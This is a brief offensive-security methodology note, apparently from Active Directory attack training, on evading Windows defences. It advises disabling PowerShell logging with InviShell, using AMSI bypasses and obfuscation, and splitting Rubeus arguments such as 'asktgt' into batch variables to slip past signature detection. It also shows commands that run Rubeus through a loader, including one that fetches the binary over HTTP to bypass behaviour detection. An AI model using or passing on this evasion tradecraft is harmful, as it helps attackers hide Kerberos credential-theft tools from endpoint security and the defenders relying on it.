# methodology

## Powershell scripts

Use [InviShell](https://github.com/OmerYa/Invisi-Shell) to disable PowerShell logging, has a built-in AMSI bypass.

Alternitavely use an AMSI bypass

If static detection is a problem, try obfuscating the tool.

## Binaries

<https://raw.githubusercontent.com/Raptoratack/ADTools/refs/heads/main/ArgSplit.bat> <https://github.com/Raptoratack/ADTools/blob/main/Loader.exe>

Use ArgSplit to obfuscate the command argument, e.g: kerberoast, asktgt, etc... Copy and paste all the `set` :

```
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
```

Check that the `%Pwn%` variable is what the want.

Use Loader.exe to load our binaries (Rubeus example):

```
Loader.exe -Path Rubeus.exe -args %Pwn% /stats /rc4opsec
```

Use Loader.exe with the behaviour detection bypass

```batchfile
Loader.exe -Path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /stats /rc4opsec
```